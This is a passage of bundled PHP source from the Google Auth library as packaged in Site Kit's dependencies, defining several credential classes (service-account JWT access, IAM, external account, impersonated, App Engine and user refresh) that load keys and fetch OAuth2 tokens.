{ throw new \LogicException(\sprintf('Service Account subject is configured for the credential. Domain-wide ' . 'delegation is not supported in universes other than %s.', self::DEFAULT_UNIVERSE_DOMAIN)); } return \false; } // If claims are set, this call is for "id_tokens" if ($this->auth->getAdditionalClaims()) { return \false; } // When true, ServiceAccountCredentials will always use JwtAccess for access tokens if ($this->useJwtAccessWithScope) { return \true; } // If the universe domain is outside the GDU, use JwtAccess for access tokens if ($this->getUniverseDomain() !== self::DEFAULT_UNIVERSE_DOMAIN) { return \true; } return \is_null($this->auth->getScope()); } } <?php /* * Copyright 2015 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Credentials; use Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader; use Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface; use Google\Site_Kit_Dependencies\Google\Auth\OAuth2; use Google\Site_Kit_Dependencies\Google\Auth\ProjectIdProviderInterface; use Google\Site_Kit_Dependencies\Google\Auth\ServiceAccountSignerTrait; use Google\Site_Kit_Dependencies\Google\Auth\SignBlobInterface; /** * Authenticates requests using Google's Service Account credentials via * JWT Access. * * This class allows authorizing requests for service accounts directly * from credentials from a json key file downloaded from the developer * console (via 'Generate new Json Key'). It is not part of any OAuth2 * flow, rather it creates a JWT and sends that as a credential. */ class ServiceAccountJwtAccessCredentials extends \Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader implements \Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface, \Google\Site_Kit_Dependencies\Google\Auth\SignBlobInterface, \Google\Site_Kit_Dependencies\Google\Auth\ProjectIdProviderInterface { use ServiceAccountSignerTrait; /** * The OAuth2 instance used to conduct authorization. * * @var OAuth2 */ protected $auth; /** * The quota project associated with the JSON credentials * * @var string */ protected $quotaProject; /** * @var string */ public $projectId; /** * Create a new ServiceAccountJwtAccessCredentials. * * @param string|array<mixed> $jsonKey JSON credential file path or JSON credentials * as an associative array * @param string|string[] $scope the scope of the access request, expressed * either as an Array or as a space-delimited String. */ public function __construct($jsonKey, $scope = null) { if (\is_string($jsonKey)) { if (!\file_exists($jsonKey)) { throw new \InvalidArgumentException('file does not exist'); } $jsonKeyStream = \file_get_contents($jsonKey); if (!($jsonKey = \json_decode((string) $jsonKeyStream, \true))) { throw new \LogicException('invalid json for auth config'); } } if (!\array_key_exists('client_email', $jsonKey)) { throw new \InvalidArgumentException('json key is missing the client_email field'); } if (!\array_key_exists('private_key', $jsonKey)) { throw new \InvalidArgumentException('json key is missing the private_key field'); } if (\array_key_exists('quota_project_id', $jsonKey)) { $this->quotaProject = (string) $jsonKey['quota_project_id']; } $this->auth = new \Google\Site_Kit_Dependencies\Google\Auth\OAuth2(['issuer' => $jsonKey['client_email'], 'sub' => $jsonKey['client_email'], 'signingAlgorithm' => 'RS256', 'signingKey' => $jsonKey['private_key'], 'scope' => $scope]); $this->projectId = $jsonKey['project_id'] ?? null; } /** * Updates metadata with the authorization token. * * @param array<mixed> $metadata metadata hashmap * @param string $authUri optional auth uri * @param callable $httpHandler callback which delivers psr7 request * @return array<mixed> updated metadata hashmap */ public function updateMetadata($metadata, $authUri = null, ?callable $httpHandler = null) { $scope = $this->auth->getScope(); if (empty($authUri) && empty($scope)) { return $metadata; } $this->auth->setAudience($authUri); return parent::updateMetadata($metadata, $authUri, $httpHandler); } /** * Implements FetchAuthTokenInterface#fetchAuthToken. * * @param callable $httpHandler * * @return null|array{access_token:string} A set of auth related metadata */ public function fetchAuthToken(?callable $httpHandler = null) { $audience = $this->auth->getAudience(); $scope = $this->auth->getScope(); if (empty($audience) && empty($scope)) { return null; } if (!empty($audience) && !empty($scope)) { throw new \UnexpectedValueException('Cannot sign both audience and scope in JwtAccess'); } $access_token = $this->auth->toJwt(); // Set the self-signed access token in OAuth2 for getLastReceivedToken $this->auth->setAccessToken($access_token); return ['access_token' => $access_token, 'expires_in' => $this->auth->getExpiry(), 'token_type' => 'Bearer']; } /** * @return string */ public function getCacheKey() { return $this->auth->getCacheKey(); } /** * @return array<mixed> */ public function getLastReceivedToken() { return $this->auth->getLastReceivedToken(); } /** * Get the project ID from the service account keyfile. * * Returns null if the project ID does not exist in the keyfile. * * @param callable $httpHandler Not used by this credentials type. * @return string|null */ public function getProjectId(?callable $httpHandler = null) { return $this->projectId; } /** * Get the client name from the keyfile. * * In this case, it returns the keyfile's client_email key. * * @param callable $httpHandler Not used by this credentials type. * @return string */ public function getClientName(?callable $httpHandler = null) { return $this->auth->getIssuer(); } /** * Get the quota project used for this API request * * @return string|null */ public function getQuotaProject() { return $this->quotaProject; } } <?php /* * Copyright 2015 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Credentials; /** * Authenticates requests using IAM credentials. */ class IAMCredentials { const SELECTOR_KEY = 'x-goog-iam-authority-selector'; const TOKEN_KEY = 'x-goog-iam-authorization-token'; /** * @var string */ private $selector; /** * @var string */ private $token; /** * @param string $selector the IAM selector * @param string $token the IAM token */ public function __construct($selector, $token) { if (!\is_string($selector)) { throw new \InvalidArgumentException('selector must be a string'); } if (!\is_string($token)) { throw new \InvalidArgumentException('token must be a string'); } $this->selector = $selector; $this->token = $token; } /** * export a callback function which updates runtime metadata. * * @return callable updateMetadata function */ public function getUpdateMetadataFunc() { return [$this, 'updateMetadata']; } /** * Updates metadata with the appropriate header metadata. * * @param array<mixed> $metadata metadata hashmap * @param string $unusedAuthUri optional auth uri * @param callable $httpHandler callback which delivers psr7 request * Note: this param is unused here, only included here for * consistency with other credentials class * * @return array<mixed> updated metadata hashmap */ public function updateMetadata($metadata, $unusedAuthUri = null, ?callable $httpHandler = null) { $metadata_copy = $metadata; $metadata_copy[self::SELECTOR_KEY] = $this->selector; $metadata_copy[self::TOKEN_KEY] = $this->token; return $metadata_copy; } } <?php /* * Copyright 2018 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Credentials; use Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenInterface; /** * Provides a set of credentials that will always return an empty access token. * This is useful for APIs which do not require authentication, for local * service emulators, and for testing. */ class InsecureCredentials implements \Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenInterface { /** * @var array{access_token:string} */ private $token = ['access_token' => '']; /** * Fetches the auth token. In this case it returns an empty string. * * @param callable $httpHandler * @return array{access_token:string} A set of auth related metadata */ public function fetchAuthToken(?callable $httpHandler = null) { return $this->token; } /** * Returns the cache key. In this case it returns a null value, disabling * caching. * * @return string|null */ public function getCacheKey() { return null; } /** * Fetches the last received token. In this case, it returns the same empty string * auth token. * * @return array{access_token:string} */ public function getLastReceivedToken() { return $this->token; } } <?php /* * Copyright 2023 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Credentials; use Google\Site_Kit_Dependencies\Google\Auth\CredentialSource\AwsNativeSource; use Google\Site_Kit_Dependencies\Google\Auth\CredentialSource\FileSource; use Google\Site_Kit_Dependencies\Google\Auth\CredentialSource\UrlSource; use Google\Site_Kit_Dependencies\Google\Auth\ExternalAccountCredentialSourceInterface; use Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenInterface; use Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface; use Google\Site_Kit_Dependencies\Google\Auth\GetUniverseDomainInterface; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory; use Google\Site_Kit_Dependencies\Google\Auth\OAuth2; use Google\Site_Kit_Dependencies\Google\Auth\ProjectIdProviderInterface; use Google\Site_Kit_Dependencies\Google\Auth\UpdateMetadataInterface; use Google\Site_Kit_Dependencies\Google\Auth\UpdateMetadataTrait; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request; use InvalidArgumentException; class ExternalAccountCredentials implements \Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenInterface, \Google\Site_Kit_Dependencies\Google\Auth\UpdateMetadataInterface, \Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface, \Google\Site_Kit_Dependencies\Google\Auth\GetUniverseDomainInterface, \Google\Site_Kit_Dependencies\Google\Auth\ProjectIdProviderInterface { use UpdateMetadataTrait; private const EXTERNAL_ACCOUNT_TYPE = 'external_account'; private const CLOUD_RESOURCE_MANAGER_URL = 'https://cloudresourcemanager.UNIVERSE_DOMAIN/v1/projects/%s'; private \Google\Site_Kit_Dependencies\Google\Auth\OAuth2 $auth; private ?string $quotaProject; private ?string $serviceAccountImpersonationUrl; private ?string $workforcePoolUserProject; private ?string $projectId; private string $universeDomain; /** * @param string|string[] $scope The scope of the access request, expressed either as an array * or as a space-delimited string. * @param array<mixed> $jsonKey JSON credentials as an associative array. */ public function __construct($scope, array $jsonKey) { if (!\array_key_exists('type', $jsonKey)) { throw new \InvalidArgumentException('json key is missing the type field'); } if ($jsonKey['type'] !== self::EXTERNAL_ACCOUNT_TYPE) { throw new \InvalidArgumentException(\sprintf('expected "%s" type but received "%s"', self::EXTERNAL_ACCOUNT_TYPE, $jsonKey['type'])); } if (!\array_key_exists('token_url', $jsonKey)) { throw new \InvalidArgumentException('json key is missing the token_url field'); } if (!\array_key_exists('audience', $jsonKey)) { throw new \InvalidArgumentException('json key is missing the audience field'); } if (!\array_key_exists('subject_token_type', $jsonKey)) { throw new \InvalidArgumentException('json key is missing the subject_token_type field'); } if (!\array_key_exists('credential_source', $jsonKey)) { throw new \InvalidArgumentException('json key is missing the credential_source field'); } if (\array_key_exists('service_account_impersonation_url', $jsonKey)) { $this->serviceAccountImpersonationUrl = $jsonKey['service_account_impersonation_url']; } $this->quotaProject = $jsonKey['quota_project_id'] ?? null; $this->workforcePoolUserProject = $jsonKey['workforce_pool_user_project'] ?? null; $this->universeDomain = $jsonKey['universe_domain'] ?? \Google\Site_Kit_Dependencies\Google\Auth\GetUniverseDomainInterface::DEFAULT_UNIVERSE_DOMAIN; $this->auth = new \Google\Site_Kit_Dependencies\Google\Auth\OAuth2(['tokenCredentialUri' => $jsonKey['token_url'], 'audience' => $jsonKey['audience'], 'scope' => $scope, 'subjectTokenType' => $jsonKey['subject_token_type'], 'subjectTokenFetcher' => self::buildCredentialSource($jsonKey), 'additionalOptions' => $this->workforcePoolUserProject ? ['userProject' => $this->workforcePoolUserProject] : []]); if (!$this->isWorkforcePool() && $this->workforcePoolUserProject) { throw new \InvalidArgumentException('workforce_pool_user_project should not be set for non-workforce pool credentials.'); } } /** * @param array<mixed> $jsonKey */ private static function buildCredentialSource(array $jsonKey) : \Google\Site_Kit_Dependencies\Google\Auth\ExternalAccountCredentialSourceInterface { $credentialSource = $jsonKey['credential_source']; if (isset($credentialSource['file'])) { return new \Google\Site_Kit_Dependencies\Google\Auth\CredentialSource\FileSource($credentialSource['file'], $credentialSource['format']['type'] ?? null, $credentialSource['format']['subject_token_field_name'] ?? null); } if (isset($credentialSource['environment_id']) && 1 === \preg_match('/^aws(\\d+)$/', $credentialSource['environment_id'], $matches)) { if ($matches[1] !== '1') { throw new \InvalidArgumentException("aws version \"{$matches[1]}\" is not supported in the current build."); } if (!\array_key_exists('regional_cred_verification_url', $credentialSource)) { throw new \InvalidArgumentException('The regional_cred_verification_url field is required for aws1 credential source.'); } if (!\array_key_exists('audience', $jsonKey)) { throw new \InvalidArgumentException('aws1 credential source requires an audience to be set in the JSON file.'); } return new \Google\Site_Kit_Dependencies\Google\Auth\CredentialSource\AwsNativeSource( $jsonKey['audience'], $credentialSource['regional_cred_verification_url'], // $regionalCredVerificationUrl $credentialSource['region_url'] ?? null, // $regionUrl $credentialSource['url'] ?? null, // $securityCredentialsUrl $credentialSource['imdsv2_session_token_url'] ?? null ); } if (isset($credentialSource['url'])) { return new \Google\Site_Kit_Dependencies\Google\Auth\CredentialSource\UrlSource($credentialSource['url'], $credentialSource['format']['type'] ?? null, $credentialSource['format']['subject_token_field_name'] ?? null, $credentialSource['headers'] ?? null); } throw new \InvalidArgumentException('Unable to determine credential source from json key.'); } /** * @param string $stsToken * @param callable $httpHandler * * @return array<mixed> { * A set of auth related metadata, containing the following * * @type string $access_token * @type int $expires_at * } */ private function getImpersonatedAccessToken(string $stsToken, ?callable $httpHandler = null) : array { if (!isset($this->serviceAccountImpersonationUrl)) { throw new \InvalidArgumentException('service_account_impersonation_url must be set in JSON credentials.'); } $request = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('POST', $this->serviceAccountImpersonationUrl, ['Content-Type' => 'application/json', 'Authorization' => 'Bearer ' . $stsToken], (string) \json_encode(['lifetime' => \sprintf('%ss', \Google\Site_Kit_Dependencies\Google\Auth\OAuth2::DEFAULT_EXPIRY_SECONDS), 'scope' => \explode(' ', $this->auth->getScope())])); if (\is_null($httpHandler)) { $httpHandler = \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build(\Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::getHttpClient()); } $response = $httpHandler($request); $body = \json_decode((string) $response->getBody(), \true); return ['access_token' => $body['accessToken'], 'expires_at' => \strtotime($body['expireTime'])]; } /** * @param callable $httpHandler * * @return array<mixed> { * A set of auth related metadata, containing the following * * @type string $access_token * @type int $expires_at (impersonated service accounts only) * @type int $expires_in (identity pool only) * @type string $issued_token_type (identity pool only) * @type string $token_type (identity pool only) * } */ public function fetchAuthToken(?callable $httpHandler = null) { $stsToken = $this->auth->fetchAuthToken($httpHandler); if (isset($this->serviceAccountImpersonationUrl)) { return $this->getImpersonatedAccessToken($stsToken['access_token'], $httpHandler); } return $stsToken; } public function getCacheKey() { return $this->auth->getCacheKey(); } public function getLastReceivedToken() { return $this->auth->getLastReceivedToken(); } /** * Get the quota project used for this API request * * @return string|null */ public function getQuotaProject() { return $this->quotaProject; } /** * Get the universe domain used for this API request * * @return string */ public function getUniverseDomain() : string { return $this->universeDomain; } /** * Get the project ID. * * @param callable $httpHandler Callback which delivers psr7 request * @param string $accessToken The access token to use to sign the blob. If * provided, saves a call to the metadata server for a new access * token. **Defaults to** `null`. * @return string|null */ public function getProjectId(?callable $httpHandler = null, ?string $accessToken = null) { if (isset($this->projectId)) { return $this->projectId; } $projectNumber = $this->getProjectNumber() ?: $this->workforcePoolUserProject; if (!$projectNumber) { return null; } if (\is_null($httpHandler)) { $httpHandler = \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build(\Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::getHttpClient()); } $url = \str_replace('UNIVERSE_DOMAIN', $this->getUniverseDomain(), \sprintf(self::CLOUD_RESOURCE_MANAGER_URL, $projectNumber)); if (\is_null($accessToken)) { $accessToken = $this->fetchAuthToken($httpHandler)['access_token']; } $request = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('GET', $url, ['authorization' => 'Bearer ' . $accessToken]); $response = $httpHandler($request); $body = \json_decode((string) $response->getBody(), \true); return $this->projectId = $body['projectId']; } private function getProjectNumber() : ?string { $parts = \explode('/', $this->auth->getAudience()); $i = \array_search('projects', $parts); return $parts[$i + 1] ?? null; } private function isWorkforcePool() : bool { $regex = '#//iam\\.googleapis\\.com/locations/[^/]+/workforcePools/#'; return \preg_match($regex, $this->auth->getAudience()) === 1; } } <?php /* * Copyright 2022 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Credentials; use Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader; use Google\Site_Kit_Dependencies\Google\Auth\IamSignerTrait; use Google\Site_Kit_Dependencies\Google\Auth\SignBlobInterface; class ImpersonatedServiceAccountCredentials extends \Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader implements \Google\Site_Kit_Dependencies\Google\Auth\SignBlobInterface { use IamSignerTrait; /** * @var string */ protected $impersonatedServiceAccountName; /** * @var UserRefreshCredentials */ protected $sourceCredentials; /** * Instantiate an instance of ImpersonatedServiceAccountCredentials from a credentials file that * has be created with the --impersonated-service-account flag. * * @param string|string[] $scope The scope of the access request, expressed either as an * array or as a space-delimited string. * @param string|array<mixed> $jsonKey JSON credential file path or JSON credentials * as an associative array. */ public function __construct($scope, $jsonKey) { if (\is_string($jsonKey)) { if (!\file_exists($jsonKey)) { throw new \InvalidArgumentException('file does not exist'); } $json = \file_get_contents($jsonKey); if (!($jsonKey = \json_decode((string) $json, \true))) { throw new \LogicException('invalid json for auth config'); } } if (!\array_key_exists('service_account_impersonation_url', $jsonKey)) { throw new \LogicException('json key is missing the service_account_impersonation_url field'); } if (!\array_key_exists('source_credentials', $jsonKey)) { throw new \LogicException('json key is missing the source_credentials field'); } $this->impersonatedServiceAccountName = $this->getImpersonatedServiceAccountNameFromUrl($jsonKey['service_account_impersonation_url']); $this->sourceCredentials = new \Google\Site_Kit_Dependencies\Google\Auth\Credentials\UserRefreshCredentials($scope, $jsonKey['source_credentials']); } /** * Helper function for extracting the Server Account Name from the URL saved in the account * credentials file. * * @param $serviceAccountImpersonationUrl string URL from "service_account_impersonation_url" * @return string Service account email or ID. */ private function getImpersonatedServiceAccountNameFromUrl(string $serviceAccountImpersonationUrl) : string { $fields = \explode('/', $serviceAccountImpersonationUrl); $lastField = \end($fields); $splitter = \explode(':', $lastField); return $splitter[0]; } /** * Get the client name from the keyfile * * In this implementation, it will return the issuers email from the oauth token. * * @param callable|null $unusedHttpHandler not used by this credentials type. * @return string Token issuer email */ public function getClientName(?callable $unusedHttpHandler = null) { return $this->impersonatedServiceAccountName; } /** * @param callable $httpHandler * * @return array<mixed> { * A set of auth related metadata, containing the following * * @type string $access_token * @type int $expires_in * @type string $scope * @type string $token_type * @type string $id_token * } */ public function fetchAuthToken(?callable $httpHandler = null) { return $this->sourceCredentials->fetchAuthToken($httpHandler); } /** * @return string */ public function getCacheKey() { return $this->sourceCredentials->getCacheKey(); } /** * @return array<mixed> */ public function getLastReceivedToken() { return $this->sourceCredentials->getLastReceivedToken(); } } <?php /* * Copyright 2015 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Credentials; /* * The AppIdentityService class is automatically defined on App Engine, * so including this dependency is not necessary, and will result in a * PHP fatal error in the App Engine environment. */ use Google\Site_Kit_Dependencies\google\appengine\api\app_identity\AppIdentityService; use Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader; use Google\Site_Kit_Dependencies\Google\Auth\ProjectIdProviderInterface; use Google\Site_Kit_Dependencies\Google\Auth\SignBlobInterface; /** * @deprecated * * AppIdentityCredentials supports authorization on Google App Engine. * * It can be used to authorize requests using the AuthTokenMiddleware or * AuthTokenSubscriber, but will only succeed if being run on App Engine: * * Example: * ``` * use Google\Auth\Credentials\AppIdentityCredentials; * use Google\Auth\Middleware\AuthTokenMiddleware; * use GuzzleHttp\Client; * use GuzzleHttp\HandlerStack; * * $gae = new AppIdentityCredentials('https://www.googleapis.com/auth/books'); * $middleware = new AuthTokenMiddleware($gae); * $stack = HandlerStack::create(); * $stack->push($middleware); * * $client = new Client([ * 'handler' => $stack, * 'base_uri' => 'https://www.googleapis.com/books/v1', * 'auth' => 'google_auth' * ]); * * $res = $client->get('volumes?q=Henry+David+Thoreau&country=US'); * ``` */ class AppIdentityCredentials extends \Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader implements \Google\Site_Kit_Dependencies\Google\Auth\SignBlobInterface, \Google\Site_Kit_Dependencies\Google\Auth\ProjectIdProviderInterface { /** * Result of fetchAuthToken. * * @var array<mixed> */ protected $lastReceivedToken; /** * Array of OAuth2 scopes to be requested. * * @var string[] */ private $scope; /** * @var string */ private $clientName; /** * @param string|string[] $scope One or more scopes. */ public function __construct($scope = []) { $this->scope = \is_array($scope) ? $scope : \explode(' ', (string) $scope); } /** * Determines if this an App Engine instance, by accessing the * SERVER_SOFTWARE environment variable (prod) or the APPENGINE_RUNTIME * environment variable (dev). * * @return bool true if this an App Engine Instance, false otherwise */ public static function onAppEngine() { $appEngineProduction = isset($_SERVER['SERVER_SOFTWARE']) && 0 === \strpos($_SERVER['SERVER_SOFTWARE'], 'Google App Engine'); if ($appEngineProduction) { return \true; } $appEngineDevAppServer = isset($_SERVER['APPENGINE_RUNTIME']) && $_SERVER['APPENGINE_RUNTIME'] == 'php'; if ($appEngineDevAppServer) { return \true; } return \false; } /** * Implements FetchAuthTokenInterface#fetchAuthToken. * * Fetches the auth tokens using the AppIdentityService if available. * As the AppIdentityService uses protobufs to fetch the access token, * the GuzzleHttp\ClientInterface instance passed in will not be used. * * @param callable $httpHandler callback which delivers psr7 request * @return array<mixed> { * A set of auth related metadata, containing the following * * @type string $access_token * @type string $expiration_time * } */ public function fetchAuthToken(?callable $httpHandler = null) { try { $this->checkAppEngineContext(); } catch (\Exception $e) { return []; } /** @phpstan-ignore-next-line */ $token = \Google\Site_Kit_Dependencies\google\appengine\api\app_identity\AppIdentityService::getAccessToken($this->scope); $this->lastReceivedToken = $token; return $token; } /** * Sign a string using AppIdentityService. * * @param string $stringToSign The string to sign. * @param bool $forceOpenSsl [optional] Does not apply to this credentials * type. * @return string The signature, base64-encoded. * @throws \Exception If AppEngine SDK or mock is not available. */ public function signBlob($stringToSign, $forceOpenSsl = \false) { $this->checkAppEngineContext(); /** @phpstan-ignore-next-line */ return \base64_encode(\Google\Site_Kit_Dependencies\google\appengine\api\app_identity\AppIdentityService::signForApp($stringToSign)['signature']); } /** * Get the project ID from AppIdentityService. * * Returns null if AppIdentityService is unavailable. * * @param callable $httpHandler Not used by this type. * @return string|null */ public function getProjectId(?callable $httpHandler = null) { try { $this->checkAppEngineContext(); } catch (\Exception $e) { return null; } /** @phpstan-ignore-next-line */ return \Google\Site_Kit_Dependencies\google\appengine\api\app_identity\AppIdentityService::getApplicationId(); } /** * Get the client name from AppIdentityService. * * Subsequent calls to this method will return a cached value. * * @param callable $httpHandler Not used in this implementation. * @return string * @throws \Exception If AppEngine SDK or mock is not available. */ public function getClientName(?callable $httpHandler = null) { $this->checkAppEngineContext(); if (!$this->clientName) { /** @phpstan-ignore-next-line */ $this->clientName = \Google\Site_Kit_Dependencies\google\appengine\api\app_identity\AppIdentityService::getServiceAccountName(); } return $this->clientName; } /** * @return array{access_token:string,expires_at:int}|null */ public function getLastReceivedToken() { if ($this->lastReceivedToken) { return ['access_token' => $this->lastReceivedToken['access_token'], 'expires_at' => $this->lastReceivedToken['expiration_time']]; } return null; } /** * Caching is handled by the underlying AppIdentityService, return empty string * to prevent caching. * * @return string */ public function getCacheKey() { return ''; } /** * @return void */ private function checkAppEngineContext() { if (!self::onAppEngine() || !\class_exists('Google\\Site_Kit_Dependencies\\google\\appengine\\api\\app_identity\\AppIdentityService')) { throw new \Exception('This class must be run in App Engine, or you must include the AppIdentityService ' . 'mock class defined in tests/mocks/AppIdentityService.php'); } } } <?php /* * Copyright 2015 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Credentials; use Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader; use Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface; use Google\Site_Kit_Dependencies\Google\Auth\OAuth2; /** * Authenticates requests using User Refresh credentials. * * This class allows authorizing requests from user refresh tokens. * * This the end of the result of a 3LO flow. E.g, the end result of * 'gcloud auth login' saves a file with these contents in well known * location * * @see [Application Default Credentials](http://goo.gl/mkAHpZ) */ class UserRefreshCredentials extends \Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader implements \Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface { /** * The OAuth2 instance used to conduct authorization. * * @var OAuth2 */ protected $auth; /** * The quota project associated with the JSON credentials * * @var string */ protected $quotaProject; /** * Create a new UserRefreshCredentials. * * @param string|string[] $scope the scope of the access request, expressed * either as an Array or as a space-delimited String. * @param string|array<mixed> $jsonKey JSON credential file path or JSON credentials * as an associative array */ public function __construct($scope, $jsonKey) { if (\is_string($jsonKey)) { if (!\file_exists($jsonKey)) { throw new \InvalidArgumentException('file does not exist'); } $json = \file_get_contents($jsonKey); if (!($jsonKey = \json_decode((string) $json, \true))) { throw new \LogicException('invalid json for auth config'); } } if (!\array_key_exists('client_id', $jsonKey)) { throw new \InvalidArgumentException('json key is missing the client_id field'); } if (!\array_key_exists('client_secret', $jsonKey)) { throw new \InvalidArgumentException('json key is missing the client_secret field'); } if (!\array_key_exists('refresh_token', $jsonKey)) { throw new \InvalidArgumentException('json key is missing the refresh_token field'); } $this->auth = new \Google\Site_Kit_Dependencies\Google\Auth\OAuth2(['clientId' => $jsonKey['client_id'], 'clientSecret' => $jsonKey['client_secret'], 'refresh_token' => $jsonKey['refresh_token'], 'scope' => $scope, 'tokenCredentialUri' => self::TOKEN_CREDENTIAL_URI]); if (\array_key_exists('quota_project_id', $jsonKey)) { $this->quotaProject = (string) $jsonKey['quota_project_id']; } } /** * @param callable $httpHandler * * @return array<mixed> { * A set of auth related metadata, containing the following * * @type string $access_token * @type int $expires_in * @type string $scope * @type string $token_type * @type string $id_token * } */ public function fetchAuthToken(?callable $httpHandler = null) { return $this->auth->fetchAuthToken($httpHandler); } /** * @return string */ public function getCacheKey() { return $this->auth->getClientId() . ':' . $this->auth->getCacheKey(); } /** * @return array<mixed> */ public function getLastReceivedToken() { return $this->auth->getLastReceivedToken(); } /** * Get the quota project used for this API request * * @return string|null */ public function getQuotaProject() { return $this->quotaProject; } /** * Get the granted scopes (if they exist) for the last fetched token. * * @return string|null */ public function getGrantedScope() { return $this->auth->getGrantedScope(); } } <?php /* * Copyright 2015 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Credentials; use Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader; use Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory; use Google\Site_Kit_Dependencies\Google\Auth\Iam; use Google\Site_Kit_Dependencies\Google\Auth\IamSignerTrait; use Google\Site_Kit_Dependencies\Google\Auth\ProjectIdProviderInterface; use Google\Site_Kit_Dependencies\Google\Auth\SignBlobInterface; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ClientException; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ConnectException; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ServerException; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request; use InvalidArgumentException; /** * GCECredentials supports authorization on Google Compute Engine. * * It can be used to authorize requests using the AuthTokenMiddleware, but will * only succeed if being run on GCE: * * use Google\Auth\Credentials\GCECredentials; * use Google\Auth\Middleware\AuthTokenMiddleware; * use GuzzleHttp\Client; * use GuzzleHttp\HandlerStack; * * $gce = new GCECredentials(); * $middleware = new 